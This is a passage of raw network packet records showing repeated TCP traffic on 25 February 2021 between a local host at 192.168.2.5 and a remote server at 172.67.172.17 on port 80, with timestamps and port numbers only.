Feb 25, 2021 11:04:07.321636915 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.321676016 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.321731091 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.349663019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.349710941 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.349805117 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.350822926 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.350866079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.350950956 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.352098942 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.352137089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.352190018 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.356703043 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.356746912 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.356818914 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.357744932 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.357781887 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.357872009 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.358830929 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.358867884 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.358942986 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.360106945 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.360145092 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.360224009 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.361691952 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.361731052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.361793995 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.362899065 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.362936974 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.363006115 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.364247084 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.364281893 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.364345074 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.365952015 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.365986109 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.366045952 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.367438078 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.367472887 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.367533922 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.369050980 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.369091034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.369153976 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.370112896 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.370147943 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.370219946 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.371840954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.371876001 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.371928930 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.373610973 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.373651028 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.373820066 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.374142885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.374176979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.374226093 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.375438929 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.375474930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.375535965 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.377099991 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.377140999 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.377223015 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.378717899 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.378753901 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.378818035 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.379821062 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.379859924 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.379940987 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.382412910 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.382447958 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.382512093 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.383481026 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.383517981 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.383604050 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.384006977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.384037018 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.384095907 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.413800001 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.413842916 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.413912058 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.414870977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.414901972 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.414966106 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.415333986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.415360928 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.415409088 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.420871019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.420907021 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.421039104 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.421566963 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.421588898 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.421675920 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.422779083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.422813892 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.422868013 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.423871040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.423901081 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.423960924 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.425362110 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.425411940 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.425477028 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.426420927 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.426450968 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.426508904 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.427594900 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.427620888 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.427705050 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.429006100 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.429035902 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.429117918 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.429430962 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.429450989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.429516077 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.430383921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.430389881 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.430526972 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.431237936 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.431266069 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.431319952 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.432145119 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.432174921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.432508945 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.433062077 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.433087111 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.433161020 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.433974981 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.434001923 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.434067965 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.434892893 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.434920073 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.435012102 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.435789108 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.435817957 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.435895920 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.436707020 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.437021017 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.437092066 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.437603951 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.437629938 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.437700987 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.438529968 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.438553095 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.438597918 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.439424992 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.439450979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.439501047 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.440336943 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.440361023 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.440412998 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.441555023 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.441581011 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.441668034 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.442236900 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.442259073 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.442378044 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.443125010 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.443150043 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.443222046 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.444113970 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.444139004 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.444215059 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.444966078 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.444998026 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.445086956 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.445905924 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.445935965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.446005106 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.447117090 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.447143078 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.447211027 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.447647095 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.447676897 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.447745085 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.448571920 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.448597908 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.448668957 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.449486017 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.449512005 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.449564934 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.450406075 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.450439930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.450510025 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.451303005 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.451332092 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.451404095 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.452220917 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.452246904 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.452341080 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.453129053 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.453155994 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.453224897 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.454025030 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.454062939 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.454180002 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.454991102 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.455444098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.455527067 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.455872059 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.455894947 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.455948114 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.456770897 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.456795931 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.456849098 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.457698107 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.457721949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.457768917 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.458599091 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.458628893 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.458719969 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.459521055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.459551096 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.459616899 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.460416079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.460443020 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.460499048 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.461345911 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.461369991 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.461432934 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.462230921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.462255955 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.462320089 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.463182926 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.463207006 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.463309050 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.464077950 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.464106083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.464202881 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.464989901 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.465014935 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.465068102 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.465903044 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.465926886 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.465980053 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.466835022 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.466864109 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.466944933 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.478050947 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.478086948 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.478195906 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.478599072 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.478621960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.478673935 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.479382992 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.479408026 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.479463100 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.484728098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.484766960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.484874010 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.485227108 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.485250950 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.485316038 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.486399889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.486445904 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.486537933 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.487668991 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.487696886 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.487776995 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.488099098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.488121986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.488182068 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.489041090 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.489068031 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.489151001 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.489942074 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.489968061 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.490015984 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.491303921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.491336107 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.491404057 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.491739035 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.491760969 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.491832972 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.492660999 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.492687941 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.492767096 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.493530035 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.493555069 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.493611097 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.494491100 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.494510889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.494570017 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.495206118 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.495232105 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.495290995 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.496031046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.496057034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.496128082 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.496860027 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.496889114 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.496958017 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.497730017 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.497755051 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.498404026 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.498496056 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.498516083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.498580933 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.499321938 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.499347925 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.499408007 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.500080109 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.500102997 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.500818968 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.500873089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.500895977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.500977993 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.501671076 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.501693010 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.501775980 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.502429962 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.502456903 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.502521992 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.503163099 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.503189087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.503262997 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.503921032 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.503943920 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.504004002 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.504652977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.504674911 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.504754066 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.505414963 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.505436897 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.505506992 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.506127119 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.506155014 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.506217957 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.506880045 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.506901979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.506972075 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.507613897 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.507639885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.507705927 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.508325100 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.508347988 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.508764029 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.509047985 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.509073019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.509143114 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.509738922 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.509762049 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.509833097 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.510430098 CET	80	49716	172.67.172.17	192.168.2.5
